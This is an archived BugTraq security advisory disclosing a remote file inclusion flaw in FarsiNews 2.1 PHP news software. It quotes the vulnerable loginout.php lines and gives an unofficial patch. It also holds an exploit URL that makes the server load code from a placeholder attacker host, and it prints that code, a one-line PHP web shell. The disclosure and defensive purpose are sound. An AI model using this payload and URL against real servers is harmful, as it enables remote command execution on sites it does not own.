BugTraq
FarsiNews 2.1 PHP Remote File Inclusion Jan 31 2006 01:47PM
h e (het_ebadi yahoo com)
Remote File Inclusion in FarsiNews 2.1 and below
Credit:
The information has been provided by Hamid Ebadi
(Hamid Network Security Team) :admin (at) hamid (dot) ir. [email concealed]
The original article can be found at :
http://hamid.ir/security

Vulnerable Systems:
FarsiNews 2.1 Beta 2 and below

Vulnerable Code:
The following lines in loginout.php :
require_once($cutepath."/inc/functions.inc.php");
require_once($cutepath."/data/config.php");

Exploits:
If register_globals=ON has been marked (check
PHP.INI) we can exploit below URL to cause it to
include external file.

The following URL will cause the server to include
external files ( phpshell.txt ):
http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell
.txt?

phpshell.txt
-------------------
<?
system ($_GET['cmd']);
die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid
Network Security Team)</h3> ");
?>
-----[EOF]--------

Workaround:
use FarsiNews 2.5 or for Unofficial Patch , simply add
the following line in the second line of
loginout.php:

if (isset($_REQUEST["cutepath"])){ die("Patched by
Hamid Ebadi -->http://hamid.ir ( Hamid Network
Security Team) "); }

Signature

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus